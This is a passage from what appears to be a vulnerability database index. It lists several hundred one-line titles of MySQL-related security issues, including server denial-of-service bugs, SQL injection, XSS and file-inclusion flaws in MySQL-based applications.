14857| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
14858| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
14859| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
14860| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
14861| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
14862| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
14863| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
14864| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
14865| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
14866| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
14867| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
14868| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
14869| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
14870| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
14871| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
14872| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
14873| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
14874| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
14875| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
14876| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
14877| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
14878| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
14879| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
14880| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
14881| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
14882| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
14883| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
14884| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
14885| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
14886| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
14887| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
14888| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
14889| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
14890| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
14891| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
14892| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
14893| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
14894| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
14895| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
14896| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
14897| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
14898| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
14899| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
14900| [89042] ViciBox Server MySQL cron Service Default Credentials
14901| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
14902| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
14903| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
14904| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
14905| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
14906| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
14907| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
14908| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
14909| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
14910| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
14911| [87480] MySQL Malformed XML Comment Handling DoS
14912| [87466] MySQL SSL Certificate Revocation Weakness
14913| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
14914| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
14915| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
14916| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
14917| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
14918| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
14919| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
14920| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
14921| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
14922| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
14923| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
14924| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
14925| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14926| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
14927| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
14928| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
14929| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
14930| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
14931| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
14932| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
14933| [84719] MySQLDumper index.php page Parameter XSS
14934| [84680] MySQL Squid Access Report access.log File Path XSS
14935| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
14936| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
14937| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
14938| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
14939| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
14940| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
14941| [83661] Oracle MySQL Unspecified Issue (59533)
14942| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
14943| [82803] Oracle MySQL Unspecified Issue (59387)
14944| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
14945| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
14946| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
14947| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
14948| [81614] MySQLDumper File Upload PHP Code Execution
14949| [81613] MySQLDumper main.php Multiple Function CSRF
14950| [81612] MySQLDumper restore.php filename Parameter XSS
14951| [81611] MySQLDumper sql.php Multiple Parameter XSS
14952| [81610] MySQLDumper install.php Multiple Parameter XSS
14953| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
14954| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
14955| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
14956| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
14957| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
14958| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
14959| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
14960| [81059] Oracle MySQL Server Multiple Unspecified Issues
14961| [79038] Webmin Process Listing MySQL Password Local Disclosure
14962| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
14963| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
14964| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
14965| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
14966| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
14967| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
14968| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
14969| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
14970| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
14971| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
14972| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
14973| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
14974| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
14975| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
14976| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
14977| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
14978| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
14979| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
14980| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
14981| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
14982| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
14983| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
14984| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
14985| [78375] Oracle MySQL Server Unspecified Local DoS
14986| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
14987| [78373] Oracle MySQL Server Unspecified Local Issue
14988| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
14989| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
14990| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
14991| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
14992| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
14993| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
14994| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
14995| [77040] DBD::mysqlPP Unspecified SQL Injection
14996| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
14997| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
14998| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
14999| [73387] Zend Framework PDO_MySql Character Set Security Bypass
15000| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
15001| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
15002| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
15003| [71368] Accellion File Transfer Appliance Weak MySQL root Password
15004| [70967] MySQL Eventum Admin User Creation CSRF
15005| [70966] MySQL Eventum preferences.php full_name Parameter XSS
15006| [70961] MySQL Eventum list.php Multiple Parameter XSS
15007| [70960] MySQL Eventum forgot_password.php URI XSS
15008| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
15009| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
15010| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
15011| [69395] MySQL Derived Table Grouping DoS
15012| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
15013| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
15014| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
15015| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
15016| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
15017| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
15018| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
15019| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
15020| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
15021| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
15022| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
15023| [68996] MySQL EXPLAIN EXTENDED Statement DoS
15024| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
15025| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
15026| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
15027| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
15028| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
15029| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
15030| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
15031| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
15032| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
15033| [67381] MySQL InnoDB Temporary Table Handling DoS
15034| [67380] MySQL BINLOG Statement Unspecified Argument DoS
15035| [67379] MySQL Multiple Operation NULL Argument Handling DoS
15036| [67378] MySQL Unique SET Column Join Statement Remote DoS
15037| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
15038| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
15039| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
15040| [66731] PHP Bundled MySQL Library Unspecified Issue
15041| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
15042| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
15043| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
15044| [65085] MySQL Enterprise Monitor Unspecified CSRF
15045| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
15046| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
15047| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
15048| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
15049| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
15050| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
15051| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
15052| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
15053| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
15054| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
15055| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
15056| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
15057| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
15058| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
15059| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
15060| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
15061| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
15062| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
15063| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
15064| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
15065| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
15066| [59907] MySQL on Windows bind-address Remote Connection Weakness
15067| [59906] MySQL on Windows Default Configuration Logging Weakness
15068| [59616] MySQL Hashed Password Weakness
15069| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
15070| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
15071| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
15072| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
15073| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
15074| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
15075| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
15076| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
15077| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
15078| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
15079| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
15080| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
15081| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15082| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
15083| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
15084| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
15085| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
15086| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15087| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
15088| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
15089| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
15090| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15091| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
15092| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
15093| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
15094| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
15095| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
15096| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
15097| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
15098| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
15099| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
15100| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
15101| [52464] MySQL charset Column Truncation Weakness
15102| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
15103| [52378] Cisco ANM MySQL root Account Default Password
15104| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
15105| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
15106| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
15107| [50892] MySQL Calendar index.php username Parameter SQL Injection
15108| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
15109| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
15110| [48710] MySQL Command Line Client HTML Output XSS
15111| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
15112| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
15113| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
15114| [47789] mysql-lists Unspecified XSS
15115| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
15116| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
15117| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
15118| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
15119| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
15120| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
15121| [43179] MySQL Server BINLOG Statement Rights Checking Failure
15122| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
15123| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
15124| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
15125| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
15126| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
15127| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
15128| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
15129| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
15130| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
15131| [39279] PHP mysql_error() Function XSS
15132| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
15133| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
15134| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
15135| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
15136| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
15137| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
15138| [37782] MySQL Community Server External Table View Privilege Escalation
15139| [37781] MySQL ALTER TABLE Information Disclosure
15140| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
15141| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
15142| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
15143| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
15144| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
15145| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
15146| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
15147| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
15148| [36251] Associated Press (AP) Newspower Default MySQL root Password
15149| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
15150| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
15151| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
15152| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
15153| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
15154| [34734] MySQL Crafted IF Clause Divide-by-zero NULL Dereference DoS
15155| [34038] MySQL Commander ressourcen/dbopen.php home Parameter Remote File Inclusion
15156| [33974] MySQL information_schema Table Subselect Single-Row DoS
15157| [33678] MySQLNewsEngine affichearticles.php3 newsenginedir Parameter Remote File Inclusion
15158| [33447] WGS-PPC (PPC Search Engine) config/mysql_config.php INC Parameter Remote File Inclusion
15159| [33372] deV!L'z Clanportal inc/filebrowser/browser.php MySQL Data Disclosure
15160| [33147] ActiveCalendar data/mysqlevents.php css Parameter XSS
15161| [32784] Storystream mysqli.php baseDir Parameter Remote File Inclusion
15162| [32783] Storystream mysql.php baseDir Parameter Remote File Inclusion
15163| [32421] Contenido CMS conlib/db_mysqli.inc Direct Request Path Disclosure
15164| [32272] JevonCMS /phplib/db_mysql.inc Direct Request Path Disclosure
15165| [32171] Blue Magic Board db_mysql_error.php Direct Request Path Disclosure
15166| [32056] BTSaveMySql Direct Request Config File Disclosure
15167| [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
15168| [32024] TikiWiki tiki-wiki_rss.php ver MySQL Credential Disclosure
15169| [31963] Agora MysqlfinderAdmin.php _SESSION[PATH_COMPOSANT] Parameter Remote File Inclusion
15170| [31431] ZoomStats libs/dbmax/mysql.php GLOBALS[lib][db][path] Parameter Remote File Inclusion
15171| [30172] TikiWiki Multiple Script Empty sort_mode Parameter MySQL Authentication Credential Disclosure
15172| [29696] MySQLDumper sql.php db Parameter XSS
15173| [29453] ConPresso CMS db_mysql.inc.php msg Parameter XSS
15174| [29122] cPanel mysqladmin/hooksadmin Unspecified Privilege Escalation
15175| [28296] MySQL Crafted multiupdate / subselects Query Local DoS
15176| [28288] MySQL Instance_options::complete_initialization Function Overflow
15177| [28030] Tutti Nova class.novaRead.mysql.php TNLIB_DIR Parameter Remote File Inclusion
15178| [28029] Tutti Nova class.novaAdmin.mysql.php TNLIB_DIR Parameter Remote File Inclusion
15179| [28028] Tutti Nova class.novaEdit.mysql.php TNLIB_DIR Parameter Remote File Inclusion
15180| [28013] MySQL SUID Routine Miscalculation Arbitrary DML Statement Execution
15181| [28012] MySQL Case Sensitivity Unauthorized Database Creation
15182| [27919] MySQL VIEW Access information_schema.views Information Disclosure
15183| [27703] MySQL MERGE Table Privilege Persistence
15184| [27593] Drupal database.mysqli.inc Multiple Parameter SQL Injection
15185| [27549] Opsware NAS /etc/init.d/mysqll MySQL root Cleartext Password Local Disclosure
15186| [27416] MySQL Server time.cc date_format Function Format String
15187| [27054] MySQL mysqld str_to_date Function NULL Argument DoS
15188| [26923] PHP/MySQL Classifieds (PHP Classifieds) search.php rate Parameter SQL Injection
15189| [26922] PHP/MySQL Classifieds (PHP Classifieds) AddAsset1.php Multiple Field XSS
15190| [26822] Bee-hive Lite include/listall.inc.php mysqlcall Parameter Remote File Inclusion
15191| [26821] Bee-hive Lite conad/include/mysqlCall.inc.php config Parameter Remote File Inclusion
15192| [26820] Bee-hive Lite conad/logout.inc.php mysqlCall Parameter Remote File Inclusion
15193| [26819] Bee-hive Lite conad/login.inc.php mysqlCall Parameter Remote File Inclusion
15194| [26818] Bee-hive Lite conad/checkPasswd.inc.php mysqlCall Parameter Remote File Inclusion
15195| [26817] Bee-hive Lite conad/changeUserDetails.inc.php mysqlCall Parameter Remote File Inclusion
15196| [26816] Bee-hive Lite conad/changeEmail.inc.php mysqlCall Parameter Remote File Inclusion
15197| [26125] Open Searchable Image Catalogue core.php do_mysql_query Function Error Message XSS
15198| [26123] Open Searchable Image Catalogue core.php do_mysql_query Function SQL Injection
15199| [25987] MySQL Multibyte Encoding SQL Injection Filter Bypass
15200| [25908] Drupal database.mysql.inc Multiple Parameter SQL Injection
15201| [25595] Apple Mac OS X MySQL Manager Blank root Password
15202| [25228] MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure
15203| [25227] MySQL COM_TABLE_DUMP Packet Overflow
15204| [25226] MySQL Malformed Login Packet Remote Memory Disclosure
15205| [24245] Cholod Mysql Based Message Board Unspecified XSS
15206| [24244] Cholod Mysql Based Message Board mb.cgi showmessage Action SQL Injection
15207| [23963] WoltLab Burning Board class_db_mysql.php SQL Error Message XSS
15208| [23915] Netcool/NeuSecure MySQL Database Connection Restriction Bypass
15209| [23611] Aztek Forum index.php msg Variable Forced MySQL Error Information Disclosure
15210| [23526] MySQL Query NULL Charcter Logging Bypass
15211| [23157] PHP/MYSQL Timesheet changehrs.php Multiple Parameter SQL Injection
15212| [23156] PHP/MYSQL Timesheet index.php Multiple Parameter SQL Injection
15213| [22995] PAM-MySQL Authentication pam_get_item() Function Unspecified Privilege Escalation
15214| [22994] PAM-MySQL SQL Logging Facility Segfault DoS
15215| [22485] Recruitment Software admin/site.xml MySQL Authentication Credential Disclosure
15216| [22479] PHP mysqli Extension Error Message Format String
15217| [22232] PHP Pipe Variable mysql_connect() Function Overflow
15218| [21685] MySQL Auction Search Module keyword XSS
15219| [20698] Campsite notifyendsubs Cron MySQL Password Cleartext Remote Disclosure
15220| [20145] Proofpoint Protection Server Embedded MySQL Server Unpassworded root Account
15221| [19457] aMember Pro mysql.inc.php Remote File Inclusion
15222| [19377] MAXdev MD-Pro /MySQL_Tools/admin.php Path Disclosure
15223| [18899] MySQL UDF Library Arbitrary Function Load Privilege Escalation
15224| [18898] MySQL UDF LoadLibraryEx Function Nonexistent Library Load DoS
15225| [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation
15226| [18896] MySQL User-Defined Function init_syms() Function Overflow
15227| [18895] MySQL libmysqlclient.so host Parameter Remote Overflow
15228| [18894] MySQL drop database Request Remote Overflow
15229| [18622] FunkBoard mysql_install.php Email Field Arbitrary PHP Code Injection
15230| [18620] FunkBoard mysql_install.php Admin/Database Password Manipulation
15231| [18406] MySQL Eventum releases.php SQL Injection
15232| [18405] MySQL Eventum custom_fields_graph.php SQL Injection
15233| [18404] MySQL Eventum custom_fields.php SQL Injection
15234| [18403] MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
15235| [18402] MySQL Eventum get_jsrs_data.php F Parameter XSS
15236| [18401] MySQL Eventum list.php release Parameter XSS
15237| [18400] MySQL Eventum view.php id Parameter XSS
15238| [18173] MySQL on Windows USE Command MS-DOS Device Name DoS
15239| [17801] Bugzilla MySQL Replication Race Condition Information Disclosure
15240| [17223] xMySQLadmin Symlink Arbitrary File Deletion
15241| [16727] MySQL Nonexistent '--user' Error Incorrect Privilege Database Invocation
